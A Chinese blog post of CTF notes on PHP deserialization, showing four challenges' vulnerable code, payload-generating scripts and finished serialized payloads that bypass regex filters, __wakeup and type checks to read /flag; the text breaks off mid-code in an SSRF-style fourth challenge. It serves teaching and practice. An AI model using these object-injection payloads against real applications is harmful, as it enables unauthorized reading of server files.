<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/2.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/1.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="unserialize1题目代码如下： 1234567891011&lt;?php    show_source(__FILE__);    class XianZhi&amp;#123;        public $name;        function __destruct()&amp;#123;          echo file_get_contents($this-&gt;name);">
<meta property="og:type" content="article">
<meta property="og:title" content="web反序列化漏洞笔记">
<meta property="og:url" content="http://example.com/2020/11/05/web%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/index.html">
<meta property="og:site_name" content="Blog of lgq">
<meta property="og:description" content="unserialize1题目代码如下： 1234567891011&lt;?php    show_source(__FILE__);    class XianZhi&amp;#123;        public $name;        function __destruct()&amp;#123;          echo file_get_contents($this-&gt;name);">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2020/11/06/YP3ogdrz6Lp5tRf.png">
<meta property="og:image" content="https://i.loli.net/2020/11/05/qCQgokfKpHBE5Pr.png">
<meta property="og:image" content="https://i.loli.net/2020/11/05/JfgkMBQZWb5p89i.png">
<meta property="og:image" content="https://i.loli.net/2020/11/05/avUcOojmYsw4IRD.png">
<meta property="og:image" content="https://i.loli.net/2020/11/06/xl1D5rSfYq2RbnM.png">
<meta property="article:published_time" content="2020-11-05T15:08:05.110Z">
<meta property="article:modified_time" content="2020-11-13T12:12:14.846Z">
<meta property="article:author" content="lgq">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/11/06/YP3ogdrz6Lp5tRf.png">

<link rel="canonical" href="http://example.com/2020/11/05/web%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>web反序列化漏洞笔记 | Blog of lgq</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Blog of lgq</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://example.com/2020/11/05/web%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="lgq">
      <meta itemprop="description" content="欢迎浏览， 请多多指教">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Blog of lgq">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          web反序列化漏洞笔记
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2020-11-05 23:08:05" itemprop="dateCreated datePublished" datetime="2020-11-05T23:08:05+08:00">2020-11-05</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2020-11-13 20:12:14" itemprop="dateModified" datetime="2020-11-13T20:12:14+08:00">2020-11-13</time>
              </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="unserialize1"><a href="#unserialize1" class="headerlink" title="unserialize1"></a>unserialize1</h1><p>题目代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    show_source(__FILE__);</span><br><span class="line">    class XianZhi&#123;</span><br><span class="line">        public $name;</span><br><span class="line">        function __destruct()&#123;</span><br><span class="line">          echo file_get_contents($this-&gt;name);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    unserialize($_GET[&#39;a&#39;]);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>



<h2 id="解题方法"><a href="#解题方法" class="headerlink" title="解题方法"></a>解题方法</h2><p>将上面代码改为如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    class XianZhi&#123;</span><br><span class="line">        public $name;</span><br><span class="line">        function __destruct()&#123;</span><br><span class="line">          echo file_get_contents($this-&gt;name);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">$a &#x3D; new XianZhi();</span><br><span class="line">$a-&gt;name&#x3D;&quot;&#x2F;flag&quot;;</span><br><span class="line">echo serialize($a);    </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>或者可以将代码改写成：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">    class XianZhi&#123;</span><br><span class="line">        public $name&#x3D;&quot;&#x2F;flag&quot;;</span><br><span class="line">        function __destruct()&#123;</span><br><span class="line">          echo file_get_contents($this-&gt;name);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">$a &#x3D; new XianZhi();</span><br><span class="line">echo serialize($a);    </span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>然后再运行代码就会获得payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:7:&quot;XianZhi&quot;:1:&#123;s:4:&quot;name&quot;;s:5:&quot;&#x2F;flag&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>然后再用get的方式传进去就可以夺旗了。</p>
<p>用get的方式传进去就是在地址栏上输入：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">47.98.234.232:28032&#x2F;?a&#x3D;O:7:&quot;XianZhi&quot;:1:&#123;s:4:&quot;name&quot;;s:5:&quot;&#x2F;flag&quot;;&#125;</span><br></pre></td></tr></table></figure>



<h2 id="题目解析"><a href="#题目解析" class="headerlink" title="题目解析"></a>题目解析</h2><p>显示源代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">show_source(__FILE__);</span><br></pre></td></tr></table></figure>

<p>new出对象XianZhi并赋值给变量$a</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$a &#x3D; new XianZhi()；</span><br></pre></td></tr></table></figure>

<p>非常典型的一个反序列函数，通过get的方式传进来；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">unserialize($_GET[&#39;a&#39;]);</span><br></pre></td></tr></table></figure>

<p>将对象给序列化成字符串</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo serialize($a);</span><br></pre></td></tr></table></figure>

<p>而有file_get_contents函数就有了访问服务器内网的方式，我们就可以通过控制name属性来访问flag文件。</p>
<h1 id="unserialize2"><a href="#unserialize2" class="headerlink" title="unserialize2"></a>unserialize2</h1><p>题目代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Demo &#123;</span><br><span class="line">    private $file &#x3D; &#39;index.php&#39;;</span><br><span class="line"></span><br><span class="line">    public function __construct($file) &#123;</span><br><span class="line">        $this-&gt;file &#x3D; $file;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">        echo @highlight_file($this-&gt;file, true);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __wakeup() &#123;</span><br><span class="line">        if ($this-&gt;file !&#x3D; &#39;index.php&#39;) &#123;</span><br><span class="line">            &#x2F;&#x2F;the secret is in the f15g_1s_here.php</span><br><span class="line">            $this-&gt;file &#x3D; &#39;index.php&#39;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if (isset($_GET[&#39;var&#39;])) &#123;</span><br><span class="line">    $var &#x3D; base64_decode($_GET[&#39;var&#39;]);</span><br><span class="line">    if (preg_match(&#39;&#x2F;[oc]:\d+:&#x2F;i&#39;, $var)) &#123;</span><br><span class="line">        die(&#39;stop hacking!&#39;);</span><br><span class="line">    &#125; else &#123;</span><br><span class="line"></span><br><span class="line">        @unserialize($var);</span><br><span class="line">    &#125;</span><br><span class="line">&#125; else &#123;</span><br><span class="line">    highlight_file(&quot;index.php&quot;);</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<h2 id="解题方法-1"><a href="#解题方法-1" class="headerlink" title="解题方法"></a>解题方法</h2><p>将代码改为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class Demo &#123;</span><br><span class="line">    private $file &#x3D; &#39;index.php&#39;;</span><br><span class="line"></span><br><span class="line">    public function __construct($file) &#123;</span><br><span class="line">        $this-&gt;file &#x3D; $file;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">&#125;    </span><br><span class="line">$a &#x3D; new Demo(&quot;f15g_1s_here.php&quot;);</span><br><span class="line">$payload &#x3D; serialize($a);</span><br><span class="line">$payload &#x3D; str_replace(&#39;:4&#39;, &quot;:+4&quot;, $payload);</span><br><span class="line">$payload &#x3D; str_replace(&#39;:1:&#39;, &quot;:+2:&quot;, $payload);</span><br><span class="line">echo base64_encode($payload);</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>运行程序得到payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">TzorNDoiRGVtbyI6KzI6e3M6MTA6IgBEZW1vAGZpbGUiO3M6MTY6ImYxNWdfMXNfaGVyZS5waHAiO30&#x3D;</span><br></pre></td></tr></table></figure>

<p>再有get方式上传，在地址栏上输入 </p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">47.98.234.232:28067&#x2F;var&#x3D;TzorNDoiRGVtbyI6KzI6e3M6MTA6IgBEZW1vAGZpbGUiO3M6MTY6ImYxNWdfMXNfaGVyZS5waHAiO30&#x3D;</span><br></pre></td></tr></table></figure>

<p>访问即可夺旗</p>
<h2 id="题目解析-1"><a href="#题目解析-1" class="headerlink" title="题目解析"></a>题目解析</h2><p>访问源代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">highlight_file(&quot;index.php&quot;);</span><br></pre></td></tr></table></figure>

<p>_wakeup的作用是使用反序列函数时触发，就是说当我们使用反序列化时就会直接运行下面的代码，如果说这个file属性这个值不是index就会强行转换为index这个值；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">function __wakeup() &#123;</span><br><span class="line">        if ($this-&gt;file !&#x3D; &#39;index.php&#39;) &#123;</span><br><span class="line">            &#x2F;&#x2F;the secret is in the f15g_1s_here.php</span><br><span class="line">            $this-&gt;file &#x3D; &#39;index.php&#39;;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>对我们传进来的东西进行了过滤，我们传进来的东西必须要被base64编码的；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">if (isset($_GET[&#39;var&#39;])) &#123;</span><br><span class="line">    $var &#x3D; base64_decode($_GET[&#39;var&#39;]);</span><br></pre></td></tr></table></figure>

<p>对我们传进来的内容进行了正则匹配过滤；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if (preg_match(&#39;&#x2F;[oc]:\d+:&#x2F;i&#39;, $var))</span><br></pre></td></tr></table></figure>

<p> 初始化我们的类file，然后我们就可以对类file进行赋值</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">function __construct($file)</span><br></pre></td></tr></table></figure>

<p>将对象Demo赋值给变量$a</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$a &#x3D; new Demo(&quot;f15g_1s_here.php&quot;);</span><br></pre></td></tr></table></figure>

<p>将对象字符串化再赋值给变量$payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$payload &#x3D; serialize($a);</span><br></pre></td></tr></table></figure>

<p>为了绕过正则匹配和_wake，第一行是将正则匹配到的东西给替换从而绕过，第二行替换，是利用php5.5之前的漏洞当我们序列化的对象里面的属性大于它真实的值的时候它会绕过wake去执行；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$payload &#x3D; str_replace(&#39;:4&#39;, &quot;:+4&quot;, $payload);</span><br><span class="line">$payload &#x3D; str_replace(&#39;:1:&#39;, &quot;:+2:&quot;, $payload);</span><br></pre></td></tr></table></figure>

<p>变量$payload进行base64编码，然后打印；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo base64_encode($payload);</span><br></pre></td></tr></table></figure>



<h1 id="unserialize3"><a href="#unserialize3" class="headerlink" title="unserialize3"></a>unserialize3</h1><p>题目代码如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">class FileHandler &#123;</span><br><span class="line"></span><br><span class="line">    protected $op;</span><br><span class="line">    protected $filename;</span><br><span class="line">    protected $content;</span><br><span class="line"></span><br><span class="line">    function __construct() &#123;</span><br><span class="line">        $op &#x3D; &quot;1&quot;;</span><br><span class="line">        $filename &#x3D; &quot;&#x2F;tmp&#x2F;tmpfile&quot;;</span><br><span class="line">        $content &#x3D; &quot;Hello World!&quot;;</span><br><span class="line">        $this-&gt;process();   </span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function process() &#123;</span><br><span class="line">        if($this-&gt;op &#x3D;&#x3D; &quot;1&quot;) &#123;</span><br><span class="line">            $this-&gt;write();       </span><br><span class="line">        &#125; else if($this-&gt;op &#x3D;&#x3D; &quot;2&quot;) &#123;</span><br><span class="line">            $res &#x3D; $this-&gt;read();</span><br><span class="line">            $this-&gt;output($res);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;output(&quot;Bad Hacker!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function write() &#123;</span><br><span class="line">        if(isset($this-&gt;filename) &amp;&amp; isset($this-&gt;content)) &#123;</span><br><span class="line">            if(strlen((string)$this-&gt;content) &gt; 100) &#123;</span><br><span class="line">                $this-&gt;output(&quot;Too long!&quot;);</span><br><span class="line">                die();</span><br><span class="line">            &#125;</span><br><span class="line">            $res &#x3D; file_put_contents($this-&gt;filename, $this-&gt;content);</span><br><span class="line">            if($res) $this-&gt;output(&quot;Successful!&quot;);</span><br><span class="line">            else $this-&gt;output(&quot;Failed!&quot;);</span><br><span class="line">        &#125; else &#123;</span><br><span class="line">            $this-&gt;output(&quot;Failed!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function read() &#123;</span><br><span class="line">        $res &#x3D; &quot;&quot;;</span><br><span class="line">        if(isset($this-&gt;filename)) &#123;</span><br><span class="line">            $res &#x3D; file_get_contents($this-&gt;filename);</span><br><span class="line">        &#125;</span><br><span class="line">        return $res;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private function output($s) &#123;</span><br><span class="line">        echo &quot;[Result]: &lt;br&gt;&quot;;</span><br><span class="line">        echo $s;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">        if($this-&gt;op &#x3D;&#x3D;&#x3D; &quot;2&quot;)</span><br><span class="line">            $this-&gt;op &#x3D; &quot;1&quot;;</span><br><span class="line">        $this-&gt;content &#x3D; &quot;&quot;;</span><br><span class="line">        $this-&gt;process();</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function is_valid($s) &#123;</span><br><span class="line">    for($i &#x3D; 0; $i &lt; strlen($s); $i++)</span><br><span class="line">        if(!(ord($s[$i]) &gt;&#x3D; 32 &amp;&amp; ord($s[$i]) &lt;&#x3D; 125))</span><br><span class="line">            return false;</span><br><span class="line">    return true;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_GET&#123;&#39;str&#39;&#125;)) &#123;</span><br><span class="line"></span><br><span class="line">    $str &#x3D; (string)$_GET[&#39;str&#39;];</span><br><span class="line">    if(is_valid($str)) &#123;</span><br><span class="line">        $obj &#x3D; unserialize($str);</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h2 id="解题方法-2"><a href="#解题方法-2" class="headerlink" title="解题方法"></a>解题方法</h2><p>将代码改为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">class FileHandler &#123;</span><br><span class="line"></span><br><span class="line">    protected $op&#x3D;2;</span><br><span class="line">    protected $filename&#x3D;&quot;&#x2F;flag&quot;;</span><br><span class="line">    protected $content&#x3D;1;</span><br><span class="line"> </span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">echo  serialize(new FileHandler);</span><br></pre></td></tr></table></figure>

<p>就会得到一个带有不可见字符的payload，</p>
<p><img src="https://i.loli.net/2020/11/06/YP3ogdrz6Lp5tRf.png" alt="1604661092726.png"></p>
<p>将该payload的不可见字符改成\00，将s改为S，如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:11:&quot;FileHandler&quot;:3:&#123;S:5:&quot;\00*\00op&quot;;i:2;S:11:&quot;\00*\00filename&quot;;S:5:&quot;&#x2F;flag&quot;;s:10:&quot;\00*\00content&quot;;i:1;&#125;</span><br></pre></td></tr></table></figure>

<p>然后再用get方式传输，即可夺旗；</p>
<h2 id="题目解析-2"><a href="#题目解析-2" class="headerlink" title="题目解析"></a>题目解析</h2><p>如果op等于2就会强制转化成1，但三个等号还会比较数据类型是否一致，“2”是字符串，2是int型，所以可以直接让op等于2进行绕过；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">function __destruct() &#123;</span><br><span class="line">        if($this-&gt;op &#x3D;&#x3D;&#x3D; &quot;2&quot;)</span><br><span class="line">            $this-&gt;op &#x3D; &quot;1&quot;;</span><br></pre></td></tr></table></figure>

<p>限制不可见字符，导致无法url编码绕过；</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">function is_valid($s) &#123;</span><br><span class="line">    for($i &#x3D; 0; $i &lt; strlen($s); $i++)</span><br><span class="line">        if(!(ord($s[$i]) &gt;&#x3D; 32 &amp;&amp; ord($s[$i]) &lt;&#x3D; 125))</span><br><span class="line">            return false;</span><br><span class="line">    return true;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如果/flag被过滤了，我们可以用16进制来代替它；</p>
<p>在sublime软件中输入代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"> echo bin2hex(&#39;&#x2F;flag&#39;);</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>即可获得flag的十六进制2f666c6167，</p>
<p>然后再将payload改成：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">O:11:&quot;FileHandler&quot;:3:&#123;S:5:&quot;\00*\00op&quot;;i:2;S:11:&quot;\00*\00filename&quot;;S:5:&quot;\2f\66\6c\61\67&quot;;s:10:&quot;\00*\00content&quot;;i:1;&#125;</span><br></pre></td></tr></table></figure>

<p>即可；</p>
<h1 id="unserialize4"><a href="#unserialize4" class="headerlink" title="unserialize4"></a>unserialize4</h1><p>题目代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"> &lt;?php</span><br><span class="line"></span><br><span class="line">class Hello &#123;</span><br><span class="line">    protected $a;</span><br><span class="line"></span><br><span class="line">    function test() &#123;</span><br><span class="line">        $b &#x3D; strpos($this-&gt;a, &#39;flag&#39;);</span><br><span class="line">        if($b) &#123;</span><br><span class="line">            die(&quot;Bye!&quot;);</span><br><span class="line">        &#125;</span><br><span class="line">        $c &#x3D; curl_init();</span><br><span class="line">        curl_setopt($c, CURLOPT_URL, $this-&gt;a);</span><br><span class="line">        curl_setopt($c, 